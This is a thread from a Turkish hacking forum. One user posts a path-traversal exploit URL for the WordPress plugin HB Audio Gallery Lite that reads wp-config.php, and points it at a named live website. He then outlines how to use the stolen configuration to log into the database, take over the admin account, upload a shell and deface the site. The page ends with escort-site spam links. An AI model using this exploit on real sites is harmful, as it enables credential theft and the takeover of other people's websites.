Wordpress Plugin HB Audio Gallery Lite Açığı

SkullZ

Forumdan Uzaklaştırıldı
Katılım
6 Mar 2016
Mesajlar
154
Tepkime puanı
0
Puanları
0
Bugün sizlere Wordpress Plugin HB Audio Gallery Lite açığını göstereceğim;

Google Dork:
Gizli içeriği görüntüleme kayıtlı kullanıcılar için mevcuttur!

Vuln Dosya: gallery/audio-download.php

Exploit: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Örneğin;
frenchandindianwarfoundation.org/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

Config'i çektikten sonra ne yapacağınızı bilmiyorsanız ?
Nacivat yardımı ile sitenin veritabanına giriyoruz veya phpmyadmin'e girebilirseniz o da olur. Daha sonra veritabanından userleri buluyoruz ve admini giriyoruz. İşlem bu kadardır. daha sonrası shell ve index. :D
 

LastHacker

Spys-Z
Katılım
26 Tem 2015
Mesajlar
509
Tepkime puanı
0
Puanları
0
Yaş
26
Web sitesi
frmjoker.com
Bakalım
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort konya escort bodrum escort vozol sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort
Üst
Copyright® Ajanlar.org 2012